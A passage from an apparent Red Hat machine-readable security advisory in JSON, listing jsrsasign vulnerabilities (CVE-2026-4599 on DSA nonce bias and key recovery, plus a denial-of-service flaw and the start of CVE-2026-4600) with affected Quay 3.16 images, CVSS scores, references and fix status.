            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "jsrsasign: jsrsasign: Denial of Service via infinite loop in bnModInverse function with crafted inputs"
    },
    {
      "cve": "CVE-2026-4599",
      "cwe": {
        "id": "CWE-338",
        "name": "Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)"
      },
      "discovery_date": "2026-03-23T06:01:34.008562+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2450207"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in jsrsasign. An attacker can exploit an incomplete comparison vulnerability in the getRandomBigIntegerZeroToMax and getRandomBigIntegerMinToMax functions. By manipulating incorrect comparison checks, an attacker can bias the Digital Signature Algorithm (DSA) nonces during signature generation. This allows the attacker to recover the private key, leading to a critical security compromise.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "jsrsasign: jsrsasign: Private key recovery via incomplete comparison checks biasing DSA nonces",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-4599"
        },
        {
          "category": "external",
          "summary": "RHBZ#2450207",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2450207"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-4599",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4599"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-4599",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4599"
        },
        {
          "category": "external",
          "summary": "https://gist.github.com/Kr0emer/081681818b51605c91945126d74b4f20",
          "url": "https://gist.github.com/Kr0emer/081681818b51605c91945126d74b4f20"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/commit/ee4b013478366cb16cea9a4bdfb218b6077f83b1",
          "url": "https://github.com/kjur/jsrsasign/commit/ee4b013478366cb16cea9a4bdfb218b6077f83b1"
        },
        {
          "category": "external",
          "summary": "https://github.com/kjur/jsrsasign/pull/647",
          "url": "https://github.com/kjur/jsrsasign/pull/647"
        },
        {
          "category": "external",
          "summary": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370939",
          "url": "https://security.snyk.io/vuln/SNYK-JS-JSRSASIGN-15370939"
        }
      ],
      "release_date": "2026-03-23T05:00:12.522000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "jsrsasign: jsrsasign: Private key recovery via incomplete comparison checks biasing DSA nonces"
    },
    {
      "cve": "CVE-2026-4600",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-23T06:01:39.334925+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
